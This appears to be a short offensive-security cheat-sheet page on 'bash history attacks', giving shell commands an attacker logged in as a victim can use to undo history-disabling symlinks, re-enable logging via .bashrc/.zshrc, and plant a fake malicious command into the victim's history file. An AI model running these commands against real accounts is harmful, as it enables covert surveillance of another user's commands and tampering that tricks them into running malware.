Bash History Attack

Bash History Unveiling

.bash_history is commonly in user’s home directory. In order not to store the bash history, users can link /dev/null with this file as below.

# If victim uses bash...
ln -sf /dev/null ~/.bash_history

# If victim users zsh...
ln -sf /dev/null ~/.zsh_history

Copied!

Exploitation

If attackers can login as victim user, they can unlink /dev/null then allow the bash history to be stored. If HISTFILE variable does not appear in .bashrc or .profile, attackers can add this line in the file to store the bash history.

# If victim uses bash...
unlink ~/.bash_history ; touch ~/.bash_history
echo "HISTFILE=~/.bash_history" >> ~/.bashrc

# If victim uses zsh...
unlink ~/.zsh_history ; touch ~/.zsh_history
echo "HISTFILE=~/.zsh_history" >> ~/.zshrc

Copied!

After rebooting the machine, the bash history will be stored in .bash_history file and attackers can see the history when logged in again. It may extract sensitive information.

False Information Inserting

Attackers can easily insert arbitrary content into .bash_history as follow.

# Assume `malicious` is exactly malicious binary.
echo "~/malicious" >> ~/.bash_history

Copied!

When victim see the content of the bash_history, malicious command may be executed by the victim’s misunderstanding.